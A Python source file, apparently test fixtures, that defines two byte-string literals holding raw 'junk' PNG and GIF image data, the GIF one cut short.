888ec9009431b50a47fe009f8ac13638b6547745
|
[
"Apache-2.0"
] | 30 |
2017-01-19T19:24:37.000Z
|
2021-12-06T10:23:04.000Z
|
junk_image1 = b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\xf4\x00\x00\x01v\x08\x00\x00\x00\x00\xbd\xc55\x85\x00\x00\x07\xcaIDATx\x01\xec\xd9m\xeb\xd2P\x1c\xc6\xf1\xff\xfb\x7f)g\xe1)oB\x0ef\x92\xe2\xcd\n\x94\xac\xa8\x19Ef\xa93l\xd8\xb4:n\xfe\xba\xda\xa6\xab\xe7\xff\'\x1e\xaf/x\xcdm\x0f?0\x06\xbb\xdb\xb2\x9b\xebn+\xec\xc6":\xd1\x19\xd1\x19\xd1\x19\xd1\x19\xd1\x19\xd1\x19\xd1\xd9}\x17\xf5\xb4\xf2F\xf2\xcc\x98\xb6D\xe3\xf1x)e_\x8c1\x9f\x88\xee\\{\xad\xd0P\xeaJiY\xe0\xef+)\xfb\x88\xf3\xc09t6\x85km0#\xfa-\xd5\x85\xebN$G\xff\x15\x86a\xec8:\xb3\xb6\rWk\x8f9zj\xadM\xe4o\xbb\xd5zwAOp\xf9\x98\xc6q\xfcS\xa2\xc5\x86\xe8W\x9e*\xea\xfd\xf7xO\xdfT\x15j\x14\xe8I\x13\x87\xc5wL\xab\x8bq\x11\x9d\xe8\xb6\xa5\xb2\xaa\x05\xfa\x04;\x11\xa0gi\xa2_y\xbe\xff\x10\x8e\xbe\x1f\xfc\x8b\xfe\x1c\xeb\xf5_\x0e;9z\x88y\x92^\xd0\xebD\xbf\xfaL\xf1\xc0.\xd1\x7f{\xd8%.\x9d2\xf4\xd7\xb8\xf3\xe8 9\xba\x9e\xad\xbf:\x88N\xf4\x15\xa6S\xbe\xbdW\xf0[I\x81\xfe\xc1\xcd\xb7w\xa2\xcf1~\x89\xae\xf1\x9b\x9f\xd1\x0fn\xa2\x13}\x83i\x9e.\xe8S\x8d;\xe7\xc7\xbb%\xba\x9b\xe8\xa9\xc6\xbe8\x8a\xec3\xf4\xe0-\xa6\xe36:\xd1%P\xa8\xd2z\xac\x92\x0c=m`\xdf\xb9\x8dNt\x99\xa8<\x9b\xa1\xcbg\xec\x83\xc8\x1dt60\xc6\xe0\x90\x7fZ]\xe3\xe4=N\xbe\x8dj\xca\xab\xf6\x92\xe2\xd3j\x1f\x87\xd1\x8f\xa7\xe8\x0f;w\xb3\xda6\x10\x05`\xf4\xfd_\xe5\x92(\xf4\x87&V\xf0\xc2\tz\to\xda\x85\x1f ?\xc5\x91l\x8c\x1ar\x17\x85\xc9N\x85\x82f\xce\xb7\x1a\x06\xb4: \x86\xe12\xe7\xa6\xd1\x05\x1d\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b:tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17t\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\xd0\x05]\xd0\x05]\xd0\x05}\x95A\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x87.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82\x0e]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05\x1d\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xfae\xbf\xed\xba\xed\xfe\x02\xbd\x9d\x9e\xbe\xc5G\xdd3\xf4V:^\xc7\x97\xc3\xe9t\xb8\x8e\xeb7\xe8m4~\x8d\xab\xd7\xf9\xbd\xdfW\xf1}\x82\xdeB\xe3]\xc4\xcf\\\xfe\x8a\xb8\x9f\xa0\xb7a\x1e\xa7\\\x9f#\xd5\xa1Wo~w\xf5\x17\xbd\xebS\x1dz\xe5\xe6\xe36\x0e\xf3G\x87\xd8N\xa9\x0e\xbdr\xf3y\x1f\xb7\xa7\xf9\xbd\xd3m\xec\xe7T\x87^\xb9\xf9|\xe9\xe3\xc7\xe1|>\xdc\xc6\xe62\xa7:\xf4\xba\xcd\xdf;\xf6\xf1Q\x7f\x9c\xe7*\xd5\xa1\x17\xe6y\r{\xdfu\xf7y\r[\xb1:\xf44/jN=\xd1\x99W\xa7\x0e\xbd0\xa7\x9e\xe8\xccS}\x07}\xfd\xbd\x0e7\xb1\xb0\x9b\xe1\x15\xfa\x1a{I\xf2\xa5\xec/\xd0W\xd8\x10\x0fo\xf3\xc2\xde\x1eb\x80\xbe\xc2n"\xcd\x97\xa9G\x07}\x85E\xfc\xb7\xaf\xa1C\x87\x0e\x1d:t\xe8\xd0\xa1C\x87\x0e\x1d:\xf4\x05A\x7f\xde\x8d\xf3\xa7\xc6\xddS\xc5\xe8\xd0w\xd1\x7fR\x1f\xfb\xd8U\x8c\x0e}\xecS\xbd\xdc\xaa\x18\x1d\xfag\xe2)7*F\x87\x9e\xea\xa5y\xd5\xe8\xd0\x0b\xf54\xaf\x1a\x1dz\xa1\x9e\xe6\xf5\xa3CO\xf5\xc2\xbcrt\xe8\xa9^\x98W\x8e\x0e=\xd5\xd3\xbc\rt\xe8\xa9\xbe\xd9\xa4y+\xe8\xd0\xe7q\x13\xb1\x19\xe7\x96\xd0\xa1O\xcd\xa1C\x9fZ\xfb\xbdC\xcfs\xfb\xd8\xd2A\x0e\xfa\x94\xdc\xa9^3:\xf4\xd2\xbcP\xaf\x10\x1dzi^\xa8W\x88\x0e\xbd4/\xd4+D\x87^\x9a\x17\xea\x15\xa2C/\xcd\x0b\xf5\x9a\xd1\xa1O\r\x8cKA7\x18\t\xfd\xa9\xfa\x11h\xe8\xcb\x82\xfe\xefA\x87\x0e\x1d:t\xe8\xd0\xa1C\x87\x0e\x1d:t\xe8\x1e\x0f\x84>\xc4\xe3b\xf5\xe3c\x0c\xd0=\x08\x0c}\x1d\xeaC\x17\x0b\xeb\x86\x17O\x7f\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0C\x17tA\x17tA\x17tA\x17tA\x17\xf4?\xec\x98\xa1\xaf\xf48\x0c\xc4\xff\xec\xe1\xc6\xc1\xc5\xa6\xa1\x81\xa1f\x85\x81\x85f\x81afs\xdf\x97\xb6\xbb\x01OO\xba\xb7\xf7\xa
4\x03\x1d\xb0\x91\x93\x19\xbb\xd2O\xa9\xb4}\xc9O1<f\x1d\x83_\xa8w~\xab\x11\xfc^\xc3\xf9\xa1F\xacM\x86\xff\xbc\xef\x03\x1d\xa7\xe8\xf0Yg\xe1\x17R%W\xb9\x91\xab$\xf3{\x19\xf8\xa1$\xafM\x0c\x9f\xf4}n\xfa\x8e\xdd\xfd\x05\xbd\x1f_C\xff\x9e\xe1\xd1\x7f\x1d\xfa\xd1\x1f\xe8\xff\x9dN\xdc\x8ecW\x0b6%\x8f\xac{\xcc\xb3Z\x8f\\:\xa9\xea%O[\xd1=\xd8\x12\xb43v-\xce\xcbG\xee\x9a\x1b\xa7\xb4\xb5\\\x06W\x83\xe1Uv\xf59\x89\xbdhk\xca\x99<\xe6\xbe\xcd\x061;\x85\x1e$\xf3N/Z\xc7\x1ca G\x9dM\x0c\xbd\xfc\r\x19\xee\xfcO\xf4@O\xb5\xa0\xd2@G\xb6\xad\x9c\xf8D-\xc98W\x04wd\x93\x14\xae\xb0\x11I,c?}JC59\xa9CJ\x15\xe5j0\xdc\xe55\xc98$Y\x16\x90E\xac\xa2\xd1!\xdb\xcc\xe7d\x8aFU\xf2\x80w\x94*i\x8e\x98M\xd4\x12\x06\r\x9b)\x0e\xda;\xff\x13=7\x9d\xdc\x94\x06\x1a\x06\x19\'\xcc\x8d\x0c\xa9s=\xe0!\x85\x1c0\x1ax\xda\x8a\xc4\x05]\xb7\xb8BD%+\xb8\x1a\xec]\xde\x93\xaa\x8ci\xebpr\x17:vNu\xce\xf3\x86\xc1\x92fy\xc0O\xe8\xb3\x8a\xf9\x001\x9f\xce\xde\xf9\x1f\xe8\x81\xee\xf7m\x1a\t[\xbd\xa0\xebET\xa7\xe3\xb4N\xd7\\\xe6\xe6\xe5;\x04zQ\x83\x91\x86\xd5\xb0\x96\xf7\xa4Y\x1bhP\xd5\xed\xdc\x9fj\x82\xb2)C,dg(R}C\xaf\x10\x9b\xd0gx\xcd\xf3\x03=\xd0\x19G\x95\xed\r}\xcb7\xf4\x8eF2\xe5\xe9\xca\x89dC\xbf}\xa3\x15\xd4\x05\xfajX\xcb{R\xde\xce\xfd\x1d\x87\xffQ\xdc\xd0\x07\x8c#)Y\xd2y\xd9\x07\xed\x05\xbd\xc1\xe97\xf4*k\x9e\x1f\xe8\x81\xde\xf7`\x95\x13\xba8w\xb4\x1b:5uV8\r\x11\x8e\xca\x9e\x94\x17\xf4v\x90[^\xa1/\x86\xb5\xbc\'5\x18\xfb\x06\x0e)\xc1c\xf9\xffp\xbd\xfe\xd9\x912\x99\xb7\xf5\xf5\xbe#\x18\x13\xfaN\x97B{\xe7?\xd1\x03\xbd\t\x80v\xc2\xdc6\xa0\xf0\x05}( ;\xe9@\xe5.\x80\x8e\x1bz\x05 }\x85\xbe\x18\xd6\xf2\x9e\xc4\x02\xa4\x0c\xf2\x10@\xda\x0b:\x0bT\x93\x92\xdcp\x90]\x92\xea\x0bzl\xa2yB/\xc0\x16\xb4w\xfe_\xe8\x81\x1e\x1e\xf7o\xef\x1cN\xb2{\xf0\x86\xd9\x07\xe7\xc1\xe5\x1b~\x86\xe6\xe2c\xfdb\xe7N\xf2\xde\x1e\xaba)\xdf\x93\x18\xc3Y\x84wr\xee\xdf\xe6\xde\xdf\xb3|\x84\xc7\xfb\xd9:}p8\xc7\xdb2\xf3\x0f\xf4\xcfuC\xff5\xb9T+0\xfe\xcf\xf4@\xaf\x95\xbf\xa7\x96_\x9fs\xfei\x8f\x0e\x04\x00\x00\x00\x18\x06\xf9[\xdf\xe3+\x85\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91.\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#]:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG\xfa\x1f\xe9HG:\xd2\xa5#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4KG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9H\x97\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91.\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#]:9\x03\x02\xfe\xb5\xf0\xbfX`~\x00\x00\x00\x00IEND\xaeB`\x82'
junk_image2 = b'GIF87a\xf4\x01v\x01\xf4\x1f\x00UUU\xff\x0b\x89\x01d\xdc)))\xff\xff\xff\xab\xcc\xf4\x06\x06\x06\xcf\xe2\xf8\xff\x94\xcb\x81\xb2\xee\xbe\xd7\xf6\xeb\xf3\xfc\xff\xbe\xdf\xff\xf7\xfb\xdc\xea\xfa\xf4\xf9\xfe\xff\xfa\xfd\xf1\xf6\xfd\xf9\xfb\xfe\xff\xee\xf7\xfe\xfd\xfe\xcc\xcc\xccDDD\xbb\xbb\xbb\x88\x88\x88\xdd\xdd\xddfff\x99\x99\x99\xee\xee\xee\xaa\xaa\xaawwwV\x98\xe8!\xff\x0bXMP DataXMPD?xpacke</rdf:Description> </rdf:RDF> </:xmpmeta> <?xpacket end="r"?>\x00,\x00\x00\x00\x00\xf4\x01v\x01\x00\x05\xff`%\x8edi\x9eh\xaa\xael\xeb\xbep,\xcftm\xdfx\xae\xef|\xef\xff%\x82pH,\x1a\x8f\xc8\xa4r\xc9l:\x9f\xd0\xa8tJ\xadZ\xaf\xd8\xacv\xcb\xedz\xbfB\x11xL.\x9b\xcf\xe8\xb4z\xcdn\xbb\x89\xe2\xb7|N\xaf\xdb\xef\xf8\xbc>\\\xd9\xfb\xff\x80\x81\x82\x83\x84^q\x85\x88\x89\x8a\x8b\x8c\x8dd\x87\x8e\x91\x92\x93\x94\x95\x82\x90\x96\x99\x9a\x9b\x9c\x9dW\x98\x9e\xa1\xa2\xa3\xa4\x93\xa0\xa5\xa8\xa9\xaa\xabs\xa7\xac\xaf\xb0\xb1\xb2U\xae\xb3\xb6\xb7\xb8\xb2\xb5\xb9\xbc\xbd\xbe\x9b\xbb\xbf\xc2\xc3\xc4\x84\xc1\xc5\xc8\xc9\xcao\xc7\xcb\xce\xcf\xd0\\\xcd\xd1\xd4\xd5\xd6K\xd3\xd7\xda\xdb\xd4\xd9\xdc\xdf\xe0\xc4\xde\xe1\xe4\xe5\xb6\xe3\xe6\xe9\xea\xa8\xe8\xeb\xee\xef\x9a\xed\xf0\xf3\xf4\x8c\xf2\xf5\xf8\xf9\x80\xf7\xfa\xfd\xfet\xfc\xfe\t\x1c\x88& \xc1\x83\x08\xa5\xf5I\xc8\xb0\xe1\x1a\x83\x0e#JL\x02q\xa2E\x8b\x15/jl\x98q\xa3G\x82\x1d?\x8a\xec\x17r\xa4Iz%O\xff\xaa\\\x97r\xa5Kr-_\xca\xdc\x16s\xa6\xcdn\x0bo\xea\xfcWs\xa7\xcfb=om\xb0@\xb4(\x01\x0f9\x85XX\xb2TOS"O\x9fD}\x98\x81\xc0\x86\rm\x96V\xf0\x80d\xea\xd6|Ame\xb8pa\x00\x06\xb2\x04,\\(\xb2VI\xdb<o\x87\x18\xa0\x10%\xee\x1a\xb5\x040`h\xb3\xf6\xc2T\xb9t\x87\xf8\x05\x9bt\x1d^\xa5\x1b4X\xd8\x9bWH\x07\xa2\x1d\x8a\xec\xcdp\xd5\x82\x07\x0e\x8a#\x13\xa8\xa0\x18\xc0B\x0c\x164tX\xcb\x01\xb4\x86\xaaDJ\x87\xae\x9a\xa1\x83\x06\x00\xa8+h\xce[:Lf\x03B.\x00\xb0\x80\x95\x80\xea\xd3\x92\x1dC.\xc2\xc1Ch\x0e\x8d\x85l\xc8\xd0\xfaus\xd8\x19\x14c@N\xd64\x87\xb2\xa7\xf5\xca\x16B\x99\x08Z\x02\xdd1T\xd8\xad\x99\xb3\x05\xcf\xb4\xc3D\xee\xb0[\x03\xf2\xbd\x83\t\xb0?N\xc1\xc0c\r}\xe2\xeb\xe6\xfd.,\xae\xc3i\xd9\xd7\x81}\x04\xcc\x95\x81\x80\x06\xa0&\xc4\xff\\\x17\x18p\xd6\x00\x03l0`\x06\x1c8x\x01\x06\x03P\x80\xe1\x85\x0eR\x00\x00\x00\x1c"7\xc4y!6\x88Ao\xe0e\x98b}\x14T\x88A\x07\x03\xccU\x81\x01\x1b\x94\xb5\x17\x89\x18\x18 
\xe2\x82\x14\x1c\xd8\xc1\x84Pip\x81b\x05\x06\xa6\x96\x895:\xb8\x01\x07f\r\xb9\x14\x86\x0f\n9@v\x18d\xa0\xa2\x07\x8c\t\xa1WnK\x19\x00b\x8e\x14Z\x88!\x05\x1a\xf4Vf\x83\xa3\x01\xa0A\x91\x83\xa1\xa9\xdb\x9a\x06\x0c\xd0A\x8e\xd7iE\xa3\x8d\xee\xf8w\x0b\x80\xfc\xe5\x85A}\x9b\xc9\t\x1e\x11\x80\x96E\x80\x86\\\xa5u\x01\x07\x91\xf58\xd7\x00U\x91Y\xe5\x00C\x94)D\x8f\x94\nqf\xa6D\x08\xea\x81\x07\x80&\xc6\x1dn\x96\xa6he\xa5(\x02Z\x81\xa0\nb:\xc4\x06\x80*EV\xa6\x86Z\xb5\xe6\xa1\x90bp\xab_\x14\xe0\xb5\xa5\x9c\x14\x0c\x90\xd4\x96\x04\xf0\x9a\xe0\xa1j1z\xe8\x81\xf2eX!\x07c)gA\xa1KEk\xd5\xff\xb4\xc7\x12p\xe6R\xa5\x9e\xcaRa\xea\xf0\xd9\xd6\x96s\x1de\x80\x01\xee\x11\xc1\xe0\xb4~\xca\x9a\x97\x05q\xceU\xae\x9f\r\x9e{\xee\x9f\\\x06\xa6W|D\xe8J\x80\xb0,\x12[$\xbc\xf6\x1a\xc0\xab\x96Y\x16i.\xba;\x1e\x0c\x98\xac\xfa5\x95c\xc1\x1726\x98\xaf{\xe9\xba\xaa\x04\xfdZ\xdc\xa5\x91k\x81\x16/]\tn\x00@\x8b\x1a\xc48\x00\xb6\x14\x0c\x86\x99\xca,#|q\xc1\xf3\xa6\xa3\xa7-\xe2"\x1ckU0fI-\xc2\xb2n0\xc0\x05\x14H\x80\x9b\x8eB`\xb9*\x05L+\x18h\xa5g\xfdU\xa1\xa1\x80b\xc0U\x8bs\x01\xd0\x01\xd3=\xae\n\xf5\x10;7\x9b\xa5\xd7\x8eU8"YM\r\x86(\xd7U\x11{q\xc8\x939\x98\xe8\x10nc{\xb6\xd0D\x1b\x9d4\x06\x00`\xa5\x01~-\xdb=\xd8\xdf\x15\x04^\x9f\x88X\xf2\xaa5\xdby\x82\x9bN\xce\xed\xce%4r\x00$\xbc.\xd0\x8a\xf2\xed\x9b\x06s\xfd\xbd\x99\x83\xffN6t\xff`\xa1\x17\x9b \xbfD\x00`\x16\xc9\x98\x12\xcd9\x05B\xb7\xbd\x94Y\xa6;-\xf9\x00\x94\'L{\x83\x15\xaegp\xc4\xa3\xf6\xa5c\xddiEF,\x84v\x81\xc6\x01\x07D)\x9c9\x00\x9b\x97\xbb*n\x04T\x9e\xe2\xc7\x83Yoe\x97\x1a\xb4\x0c\xe9`\xb1\xbf\xdb\xf8<\x90\xeb\x15\xab\x07\xe7\xdez)n\xf1\x11\x9b,\xc1\xe8S\x08@\x9c\x95SP\x01\xc1\t\xdb\x0f\xaf\xa0\xa8\xbfz,\xa0\x14\x80\x91\x01\xd0\xa7\xa5sY\xa0p\xf7\x8b\xd3l\x0eE=\xf4\xa1\x8bP\t\x14\x94\xd0\x06x\xa4\xb4=E\x80\x82\xaa\x9b\x86hD\xac\rP/5\xf33\x8b\xddd\xc5\xbcs\xc5O\x08S:\xd4\xf4\x06\xe0\x81\x0c\xb1oZ+la}\xd0\xc7?\x89\x19\xb0\x0f\x02\x83\x89\xe3\xf4\xc1\xb4K\xf5\x90P\xa4sB\x078\xc0\xb4R-\x81kO\xe8!\xd3$\x80D\xb0\x011\x88\x87\nL\x13\x8b\xd0\xc4)&\x81kP\x04b\xbf\xd4G\xc5\x1f\xfe\x10\nX\xc4\xe2\x13\xc3hE\xffB\xf5g\x872\x81\x12\xe7v\xf4\x8b\x0c\x80\xe9\'\xb4@\xa3L\xe64\x1dd\x9c\x05\x8eq\xc4\xa3\x1e\xcf\xb8\xc7>\xdaL\x8e~\x0cd4n&\xc8B\x86\x82\x90\x86Ld<\x00\xa9\xc8F\xfa\x02\x91\x8e\x8cd# )\xc9J"\x82\x92\x96\xccd 0\xa9\xc9N\xea\x81\x93\x9e\x0ce\x1d@)\xcaR\xba\x81\x94\xa6Le\x1aP\xa9\xcaV>\x82\x91\xae\x8c\xe5"X)\xcbZf\x81\x96\xb6\xcc%\x15p\xa9\xcb^>\x81\x97\xbe\x0c\xa6\x12\x80)\xccb\x16\x81\x98\xc6L&2\x93Y\xcce23\x98\xce|f/\xa3iI6\xb2Q\x9aG\xa0\xe6:8\xd0\x9b\x8a\xe9\xe5\x8e~\xaa\xd2\x06\xbey"\xba\xf5\x85\x9c(\x02\xe7\x85\x8c@\x96v\x92\xa50\xa5\x1a\xcf\x10\xae\xe3\xcezB\x8b\x9c\xf8\xac\x12x\xf2\xa9\x17\x14IR\x9b\xeb\x10\rx\xea\x89\x1a\xb2\x08\xe9H\xef4\'\xbd\xd0\xa6\xd0b%\x0cW\xf9l\n=\xcb2\x1a\x0b\x8cfQn$\xa7\x83\xbeI\xa1z\xb6\xffsh\xd4\x11\xd2\x85D\xda?G\x02T\x1d\x1c\xa8\\QV\x9aN\xbf\xb0t3\x16\x80\xd0b\xde\xf2\x14u>4-PlJF\xf9\xa9\xcf\x8e9\xe1)\xebt\xe8\x882yRwxs_I\x8biI\x91\x951\r|\xb3\xa6+[i\xf3 
\x8a\xcf\xa7\x0c\x85(\\\xc1J\x05\xfc\xf9\xb9\xd1\x18A\xaaJ\xb9TY\x88"S\xa3X\xb2\xa8\xeb\x18\x8b;Q\xb3\x14\xa6I\xb57\x15\xc2\xdd\xbe\x18\xaa%\xbb\x14ah\xf5\xaci[\x96\xb2\x94\xa0\x86\x81\x85C\xe2\xeaS\x9a\x02T|]\xc8HD\x85%\x1c\x87\x82\x9b\xab\x16\xa57x-\x8b=\xf3\xd2\xb7\xca\xd1\xb4\xa1]\xf9*\xdd\xa2\xcaW\xa1\n\xc7\x8dkq*T\x86\x9a\x16\xc1X,K\x7fi$Z\xcd\xd1W|\x8e\x0bC)\x83\x92\xd5\xe4w\x9699U/O\xd9MQF\xa7.\xa9N5/{-\xed:\xa3c\x81\xf7\x8ckhaM\xaeU\xa3Z\xd6\xdf\xfeS\xb1x|\xd2Y\xaa\x930\xbej\x883\xffX9\xcb\x1d\xe7\xca/Ni\xc8.\x7f\x81\xaaQZ\xeb\x9b,\x81s3\x0bYi\xa2\xf4\x9a\x1b\xd4\ng\x81\x86\\-9\x98\xe4F\xce\xd2n\xa8Ka\x12c\x8c\x0b\\\xd2f\x00z\x98M\xeeh\xeb\x1a\xd6\xfc\xdc\xf4\xbcD\x98\x1bi\xabWP\xf7\xfe\x97\xc1\xaa\x85\xaeO\x1e\xa3\x9b\xe9\xba\x13\xae|u\r\xde\x14\xaa\xab\xa7\n\xa1o\xfd\xb2\x8b\x01|\xabW\xe4\xe4\xd7\xb3!^\x82\x88\xda\xea-\x87\xae\x18<\xd0\x83M\x84\x1d\xb9(\xc7\xe43\xb4\x16U\xd3\x92\xc0cQ\x02s\xb7Z\\\xeco\x82\x8d0\xb7\r\xc8\x86?\x19 \n\xb8\x8c\xbc\x04\x97\xf6\xa6\x03\xb0\xe2\xce\x05\xee\xd7\xa7\xc7\xc0\xb7\x90\xf2e\x08\x85\xb0y\x87,sY\x94^\xfe\xb2\'\xc3,fM\x92\xb9\xccg\x950\x9a\xd7<\x853\xb3\xd9\xa4j~\xb3\x9c\x99\xe0\xe69\xc77\xcev\xce\xf31\xf1\xac\xe7>\xd7\xb9\xcf}\xfc3\xa0\xf5(\xe8A\xc3\xb1\xd0\x86\xf6\t\xa2\x13\xad\x93E3\xda&\x8e~\xff\xb4L"-i\x97P\xba\xd2*\xb94\xa6M\xa2\xe9M\x8b\xa4\xd3\x9e\xf6\x08\xa8C\xad\x91Q\x93\x1a#|>\xf53M\xfd\x86\x95\n)i\xa9N\x82T\x15L\x84+k\xf6\x08\xb6fC_\x8cP\x81\xaa\\%\n_1\xc2\xaf\xe1\xe04)\x18gQ\x15\xe0\x00\x1a\x91\x82\x10V\xbb\xe1w\x17\xf0`d\x92\xed\x05hO\x19\t5C\x82]yD\x87\xce\x16\x01/\xcc\x89\x82\xb2\x8f\x90CEUA\xb2\xcaF\n\xad\xa1\xb2m\x92\xc4\x1a\x19\xb1\xfa\xabU\xaa\xf2\x1b\xd4<\xa6\xc7\xe0\x91\x0er0s\x1cB}p\x9e\xa6\xc9\x00\xec@W\xef\xe0\xc8\x072\x03\x7f\xe8c\xb4\x86\x95\x82o\x86<\x16\xdbMo\xc4C\x9e\xe4D[9<k\x0fr\xc6\xa9\x96)\xa9us\x8bYN\xbf\xc6\xd3\xe3\xee\xc8\xa7\xe2V\x03\xcde\xb0\xa3\xa0\x0e,\xa46\xc4\xad\xe3\x05\xe6\x13[\x93\'g\xe1PN\x0b\xdf\xb4f\x9b\xf3\xe4\x87=A6\x87\xb3\xdb\x90ma\xe1\xe5C!\xf2\xd1\x84\xff\xf4\xeb$m\t\xc9s\xea\xca\xe9\x97t\xe4\xc1?\xe1\x08i\x80Qz\xc9:$\x18\xfbxp)H\xa7\x93\x8b\x04h\xbf;\xd1\xceK\x1c\xb2R\x1f8\xb7\xa0\xeb\xd8\xe7M\x05\x12\x8d\xd0\xa8\x94\x16!\xcd\x8fhr\x99\xfaX\xfa\x8a \x0e=\xc8\x03,\x7f\xd5\xad\x12\xc3t"\xe5\xc8\xb6Mz\n\x83\xbc>\xe2\x00I\xc8`.\xbaP\x86\x0e\x9f\xebp\x0c}\r\xf1\x96\x95ZZ\\\xa6UE\xc6\xd7\xb7\n\xd6\x7f=@!6\xd6\xa7`\xae\xd2\x14\xac\x0c\xc4)#\xaa\x8aU\x0c,B\xa9\x86\xc2\xf9\xab\xdc\x8aY\xddra\xa4\xd4b\xbe\x95U@7\x03\x95\xd6\xe1\x90\x057oI\x00\xb9\xeb\xdb=CKu\x017\xeejZ\x00\xc2\x1ar\xe4$*\\\xb9\xf1j\xbc\x8a\x0f\xa0f\xcf\xd7\xde\x10\xbeQ\xcc\xb2\xda<.\xbf\x86\xa2\xfb\x85,4\xfb\x93\x03\xdd31{MYe\xf05\x00\x13\xb9\xe60r\x19\x0es\xdc^?r\xb2}\x98\xf3\xa7_`sA0\xf6\xc2"\xff\xb2\xb2*I\x86%X\xb290C\x80\xe6\xb6/\xec\xa2(\xa43/\x15dnt\xe31\x148\x04}\x13~4S1\\R,\x8a\xd7+m\xf16\x1d(21\xa2!7\xf5G\xea\x90y\xcc\xa2\x16K\xd34\xdc!6V\xc38\xac\x91#\xfevL\xad\xf7\'\xb8A6\xda\xe23\xd4\xc33\xab\xf3o\xd5\xa3\x19\x8f\xd1\x82=\x92\x17WS!\x1e\xb25M\x13oxa\x16/\xa2:UA8\x86\xf3A\x18\xa3\x83\xc8\x17{\x10\x03v\x9a1\x16\xc4\x03 \xc2\xa1+k\xe3\x82\xc4\xa3}\xb8\xc1s\x07W<\x8e\xd17\xa3\xa37\xe5\xa6\x0e\xe4\xa7\x06\xf3\xb2*7\xb2\x16\xb4c%\xd1\x86;\xd5S%\x06c:L\xa2U@\x98m\xa5\xd3 U\x814\xbb\x93-<29yX D\xf4*\xb8\xc3$\xb3#:\xcdg\x00kw;\xb2\xe3<x\xd1B\x8b\x02!\x1f&:\x1f\xa3\x14\xc6\xb3\x17\x11b\x15{\xf80\x8a\x02>\x90\x92R\xdf\xd4\x81\xf8\xd6[\x85s 
\xff\xc2S\x1a\x168#U\x81>\xb0\xd3\x88+\x93\x16\xb8c%s\x02=\x981\x17m\x88\x82\xe9pz\xe7r_j\xa1?\xf7\x924\xe9\xe3\x18\xf0g?*\x13\x17\x99\xa7B\xfb\xd3(\xf3\x93\x01\x11\xb4@\xe7\x93\x8c\x1eb\x88\x1b\x84.0\x84?\xca\x11#\x04\x94\x177\xc4\x84D\xc3;\xa5\xc3\x8cq"C\xd4\xb3A\xe3\xb4\x17\xd3\xa3T`C\x85t51\xec\xe71\xec({\x9c\x82A\x9f\xd8\x81\xdb\xe8A\x87B\x8f|\xe5@{QB\x03\x94 \xc4\xe3\x86\xef\x06ob\xd4\x04S$FK\x94E_\xf4D`#E\x11\x19E>D:_\xd4|\xca\x11t\x03\xd54\x03\xc01Nd\x91\x12\xd9Ed4\x91\xafr)\x90\xa2EJ\x90E&9\x92QT\x91f\xe4C\x1ai+\x97\xd2l\t\xa9H&\x82>\xdbV!Xr_hp\x1e\xa0\x91Zp!7\xa3\x98\x10o\xa8\r\x15\xa0\x17\xc5F\x04\x19\x85wi\xc0M\xe54\x08I\xd9S\x0cq\x94\xaa\x06\x12\xff7y\x95\xbed\x95Z\xc9\x13Y\xd9\x95\xb9\xc4\x95`\xa9\x0fb9\x96\xf8P\x96f\x89\x12_\x99\x96\xae\x84\x96l\xc9Go\xc9fn\x19\x97\x08I\x97k6\x97vY\x0ex\x99\x97\x96\xb7\x96|9f~\xf9\x97f\x16\x98\x82\x99f\x85\x89M{y\x98\xd7\x90\x98\x8aY\r\x8c\xd9\x98\x83D\x98\x90\xa9H\x8f9\x99\xceP\x99\x96\xa9\x0c\x98\x99\x99\xc8\xb0\x99U`\x1c+\xe58\xbd\xa6b\xbbqM\xbe\xd1nc0\x9a\xa3R8H\xf0\x15B\xd9fY%Xi\xc0lmp\x1d\x84\xf18\x16Vc_\x85\x9aZ\x02"\xe4v\x82d\x00 9\x97\x04m\xb2\x05\xe3\x96C\xcf\x18\x9c\xbcI\x06\xbf8>\xaceW$\x07\x1f\x1e\xf7.\x8b\xe1\x1dD\x81\x151\x07-D\xb1\x16\xd9\xc9\x94\x12\xe2s\xb9!q\xec$\x9e\x0fW\x9d\x81Gs\xd7\xc4\x1e*us\xc3A\x19\xd6\x11\x9e}Bq%\x97]\x1e \x1d\xdc\xd6\x9dC\xe0\x9e\xfdV,\xe4\xf9\x9d\t\xb3\x1f\xbd\xe1\x85\xff5\xa2\x18G\x96.\xd7\xe2\x9b\x941\x14\x97\x91\x19\xdc\xa1o\xc5r!\xc7\x91dx\x01\xa0pY\x0e^\x08QeQ#\x1e\xb7!0\x82"N\x16y\xbb!\xa1\x8bb!\xbb\xe1\x1d\x034$\x94\xd2 \x12\xe2\x93\x9f\xa3\xa1\x7f\xd2$\x11\xc2rn\xa2&&\ne#\x06(Z7\x16hG$*\xda3\xf5\xa1w\xbc\x92#\x0f\x82\x83-\xd2$D\xd2u 